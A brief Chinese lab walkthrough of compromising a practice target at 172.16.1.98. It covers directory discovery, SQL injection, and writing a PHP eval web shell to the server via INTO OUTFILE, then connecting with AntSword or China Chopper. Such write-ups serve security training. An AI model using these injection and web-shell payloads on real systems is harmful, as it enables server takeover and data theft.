找到一个目标靶场的IP , 这里以172.16.1.98 为例
1、使用命令 /robots.txt 来确定目录
2、分别测试两个文件
均无法访问,可返回其根目录查询
3、到根目录,出现搜索框
4、输入ID为1
5、使用虚拟机kali的终端
搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/
6、搜索文件 info.php
即可得到 WWW 所在的根目录
7、确定闭合方式 1' #
8、确定字段
1' order by 3#
9、注入一句话“木马”
1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #
9、查看文件,木马是否注入成功
搜索 /s /up /sis.php
10、使用中国蚁键/中国菜刀等工具,进入该系统
即可成功获取信息
安全
网络安全人人有责,切勿知法犯法